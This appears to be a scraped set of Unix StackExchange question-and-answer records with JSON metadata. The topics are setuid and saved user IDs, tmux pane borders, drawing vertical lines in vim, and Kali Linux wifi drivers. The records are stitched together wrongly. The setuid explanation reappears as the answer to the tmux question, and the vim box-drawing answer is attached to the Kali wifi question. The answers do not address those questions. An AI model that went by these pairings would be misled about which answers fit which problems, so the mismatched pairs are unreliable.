Wouldn't saving the effective user ID in a variable at the beginning of the program would make the saved user ID unnecessary? It's not a question of what the userspace program remembers, but what rights the kernel lets it use. For the separation between users to work, it has to be system that controls what user IDs a process can use. Otherwise any process could just ask to become root. How can I retrieve the saved user ID in a C program ? I was not able to find any functions doing that. With standard functions you can't (there's only getuid() and geteuid() ). At least Linux has getresuid() that return all three user IDs, though. Anyway, usually you wouldn't need to read it. It's there to allow switching between the real user ID, and the effective user ID in case of a setuid program, so it starts as a copy of the effective user ID. In a setuid program, the real user ID is that of the user running it, and the effective and saved user IDs are those of the user owning the program. The effective user ID is the one that matters for privilege checks, so if the process wants to temporarily drop privileges, it changes the effective user ID between the real and the saved user IDs. In what way does the kernel use the saved user ID to check whether a process can or cannot change its user ID? Does this mean that when a process tries to change its effective user ID, the kernel checks the saved user ID to make sure, the process is allowed to do so? Yes. The Linux man page for setuid() mentions this, but it's somewhat hidden: ERRORS EPERM The user is not privileged and uid does not match the real UID or saved set-user-ID of the calling process. In other words, you can only set (the effective) user ID to one of the real or saved IDs. The man page for setreuid() is clearer on that: Unprivileged processes may only set the effective user ID to the realuser ID, the effective user ID, or the saved set-user-ID.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/549002", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/354164/" ] }
549,004
How to disable these spaces between window panels in tmux? ~/.tmux.conf #background colorset -g status-bg colour63#window settingsset -g window-status-current-style fg=black,bg=colour75set -g window-status-style bg=colour68setw -g window-status-format ' #I [#W] 'setw -g window-status-current-format ' #I [#W] '#status lines in panel on left and rightset -g status-right '#[bg=colour75][#S]'set -g status-left ''#separator linesset-option -g pane-active-border-style "bg=default"set-option -ag pane-active-border-style "fg=colour63"
Wouldn't saving the effective user ID in a variable at the beginning of the program would make the saved user ID unnecessary? It's not a question of what the userspace program remembers, but what rights the kernel lets it use. For the separation between users to work, it has to be system that controls what user IDs a process can use. Otherwise any process could just ask to become root. How can I retrieve the saved user ID in a C program ? I was not able to find any functions doing that. With standard functions you can't (there's only getuid() and geteuid() ). At least Linux has getresuid() that return all three user IDs, though. Anyway, usually you wouldn't need to read it. It's there to allow switching between the real user ID, and the effective user ID in case of a setuid program, so it starts as a copy of the effective user ID. In a setuid program, the real user ID is that of the user running it, and the effective and saved user IDs are those of the user owning the program. The effective user ID is the one that matters for privilege checks, so if the process wants to temporarily drop privileges, it changes the effective user ID between the real and the saved user IDs. In what way does the kernel use the saved user ID to check whether a process can or cannot change its user ID? Does this mean that when a process tries to change its effective user ID, the kernel checks the saved user ID to make sure, the process is allowed to do so? Yes. The Linux man page for setuid() mentions this, but it's somewhat hidden: ERRORS EPERM The user is not privileged and uid does not match the real UID or saved set-user-ID of the calling process. In other words, you can only set (the effective) user ID to one of the real or saved IDs. The man page for setreuid() is clearer on that: Unprivileged processes may only set the effective user ID to the realuser ID, the effective user ID, or the saved set-user-ID.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/549004", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/379266/" ] }
549,008
I want to make a table in vim. Making a horizontal line is easy ______________________________ For the vertical I use this yes "|" | head -10 But the result is bad ||||||||| I want something contiguous like the horizontal line. How can I do this?
If your version of Vim is compiled with multibyte support and your terminal encoding is set correctly, you may use the Unicode box-drawing characters , which include horizontal and vertical lines as well as several varieties of intersections and blocks. Vim defines some default digraphs for these characters, such as vv for │ (to enter a digraph, you use Ctrl - K ; thus in insert mode ^Kvv will insert the character │ at the cursor location). For the full list if your version of Vim supports it, type :digraphs ; for more information on the feature and to search by Unicode character name, type :help digraphs . Depending on your terminal settings and choice of font, however, box-drawing characters may not all render as connected lines, so your mileage may vary. For instance, on my machine vertical lines render as connected in the terminal (using Source Code Pro), but as broken lines in GVim (using DejaVu Sans Mono):
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/549008", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/80389/" ] }
549,012
I just bought a new HP laptop just for the purpose of installing and learning Kali linux. It had originally windows 10 installed in it. I downloaded and installed the latest version of kali linux. Everything seems to be good and working but when I tried to connect to internet, I can't to it. I can just connect using wired connection. For wireless connection, it says no wifi adapter found. I did not install kali on any virtual machine, my pc is a pure kali linux now straight booted in the drive. When I type iwconfig in the terminal, it just shows me eth0 and lo. It doesn't show wlan0. I tried looking for solution for a whole day now. I tried a method, "download compact wireless" that everyone was showing, I was able to get wlan0 and wlan1, but now the problem is it doesn't detect any wifi. Also when I reboot my laptop, it is gone and I have to do it again, its not saved. I have also realised that bluetooth is also not working. However, the download compact wireless method seems to fix the bluetooth, but ita gone at restart. There are people who said I need to get an adapter, but the laptop should have build in wifi card right? And I directly booted up in the machine, not in any virtual box, so do I really need to buy one? Whats the point of me buying a new laptop just for Kali? Please help me.
If your version of Vim is compiled with multibyte support and your terminal encoding is set correctly, you may use the Unicode box-drawing characters , which include horizontal and vertical lines as well as several varieties of intersections and blocks. Vim defines some default digraphs for these characters, such as vv for │ (to enter a digraph, you use Ctrl - K ; thus in insert mode ^Kvv will insert the character │ at the cursor location). For the full list if your version of Vim supports it, type :digraphs ; for more information on the feature and to search by Unicode character name, type :help digraphs . Depending on your terminal settings and choice of font, however, box-drawing characters may not all render as connected lines, so your mileage may vary. For instance, on my machine vertical lines render as connected in the terminal (using Source Code Pro), but as broken lines in GVim (using DejaVu Sans Mono):
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/549012", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/379274/" ] }